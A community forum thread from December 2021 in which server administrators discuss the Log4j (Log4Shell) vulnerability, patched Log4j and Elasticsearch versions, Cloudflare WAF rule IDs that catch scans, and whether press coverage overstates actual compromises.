Welcome to Centmin Mod Community
Register Now

Security Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (Log4Shell)

Discussion in 'System Administration' started by Revenge, Dec 11, 2021.

  1. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    log4j v2.16 fixed and Elasticsearch 6.8.21 and 7.16.1 actually removed the entire jndi class from their log4j usage i.e. Elasticsearch version 6.8.21 | Elasticsearch Guide [6.8] | Elastic

    https://discuss.elastic.co/t/apache...lnerability-cve-2021-44228-esa-2021-31/291476



     
  2. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Besides Cloudflare WAF rules 100514, 100515, 100516, 100517, there are other Cloudflare WAF rules that also pick up log4j vulnerability scans like 100070 for Anomly:Header:X-Forward-For

    cf-waf-log4j-firewall-events-waf-x-forward-for-01.png
     
  3. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Wow hackers know how to make $$$ reselling compromised access to systems Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges

     
  4. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Maybe not urgent enough for some folks Major tech companies struggle to plug holes in logging software

     
  5. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    https://venturebeat.com/2021/12/14/...rporate-networks-ransomware-payloads-spotted/

    @buik Internet may not be on fire, but log4j has made it kind of toasty!
     
  6. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
    The scope is changing... evolving.
     
    Last edited: Dec 17, 2021
  7. buik

    buik “The best traveler is one without a camera.”

    2,026
    524
    113
    Apr 29, 2016
    Flanders
    Ratings:
    +1,674
    Local Time:
    3:50 PM
    I asked fellow companies, colleagues I know through various steering committees.
    Because this is and will continue to be a critical CVE.
    But little activity. There is some scan activity but no (semi) successful crack.
    It doesn't seem targeted but just via a script kiddie scan all ips in a class kind of.

    Yeaah hurrah yeeeaah yooo, attemps, targeting, trivial to and attempts. :)
    But you don't hear of more successful attacks.

    The press tries to score time and time again with clickbait garbage.
    There are many knowledgeable system administrators who have long solved this problem.

    Same song with every critical CVE.
    Or like Christmas and New Year's Eve (aside from corona) every year the same nonsense in the press about more break-in attempts.

    But of more actual successful break-ins, you don't hear anything.
    After all, just like with ICT infrastructure, homeowners are better secured by ICT (smart cameras etc) and better prepared, nowadays.
     
    Last edited: Dec 17, 2021
  8. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Don't think most larger organisations have figured out if they've been compromised yet so it would be expected that reported compromises won't be reported right now but over time.

    Connectivity wise it could be easier to overlook some systems. i.e. organisation itself might be protected but they might have remote offsite backup or systems with 3rd parties that they are unaware of that have log4j dependencies. So log4j compromise a 3rd party with has data for the organisation.

    Would be similar to those AWS S3 incorrectly configured buckets set with public access for privately stored S3 data from organisations.

    With that said, seems only 2 companies have reached out to me regarding log4j, Sumo Logic and Qualys. Guess other services I use still investigating on their end or aren't impacted?
     
    Last edited: Dec 17, 2021
  9. buik

    buik “The best traveler is one without a camera.”

    2,026
    524
    113
    Apr 29, 2016
    Flanders
    Ratings:
    +1,674
    Local Time:
    3:50 PM
    In fact I am pretty sure they figured it out, without mentioning specific names.
    These have a service contract and are contacted by their account manager.
    There are too many interests at play and a supplier does not want to lose a major customer.

    There are also security service providers who are continuous monitoring your infrastructure as service. Sometimes this is even required by law. You see this kind of service more and more often. SP respond within a max of a few hours after the CVE is released, contractually defined.

    Not only respondin on CVE's, but for example also when many files are suddenly accessed over the network by night (For no reason).
    Which could indicate ransomware which is running to encrypt all the files.

    In short I am repeating myself but if your business is in good order there is no reason to panic.
    In fact, internet-criminals want panic to occur because panic causes people to make mistakes.

    And then that pesky press can write about it again. Because cucumber time and clicks.
     
    Last edited: Dec 18, 2021
  10. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Just got an email from Datadog so emails regarding log4j are rolling in I guess Update on our Response to the Log4j Vulnerability | Datadog. Need to update my Datadog Agents :)

     
  11. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
  12. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Yup my regex rules also catch RMI as well DNS :)

    But there's a new DOS vulnerability requiring log4j v2.17 newly released update Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
     
  13. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
    Nice!
    Ouch. That got spicy.

    At what point do people start calling all the patches... a quilt?
     
    Last edited: Dec 19, 2021
  14. pamamolf

    pamamolf Premium Member Premium Member

    4,074
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    4:50 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    When i use:
    Code:
    yum update --disableplugin=priorities --setopt=deltarpm=0 --enablerepo=remi,city-fan.org
    I can update to: 6.8.21-1

    After updating i can see using:

    Code:
    curl -XGET 'localhost:9200'
    "number" : "6.8.20", - Don't know why this older version....

    At Elastic site i can see as latest version the 6.8.22 but i can't get it when updating :(

    Release Notes | Elasticsearch Guide [6.8] | Elastic

    Any ideas why?

    Thanks
     
    Last edited: Dec 19, 2021
  15. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Looks like YUM repo mirrors haven't populated 6.8.22 yet
     
  16. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  17. duderuud

    duderuud Premium Member Premium Member

    238
    78
    28
    Dec 5, 2020
    The Netherlands
    Ratings:
    +169
    Local Time:
    3:50 PM
    1.25 x
    10.6
    Thanks for the update, patched my servers accordingly.
     
  18. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
     
  19. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
    Google Online Security Blog: Understanding the Impact of Apache Log4j Vulnerability
     
  20. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Definitely, a long way to go still!

    Was checking my Cloudflare Firewall event logs via Cloudflare Logpush to filter and count the log4j WAF rule events for CF WAF rules 100514, 100515, 100516 and 100517 for past 3 days and revealed the following.

    cf-logpush-log4j-waf-rule-tally-dec24-2021-02a.png

    Full log here.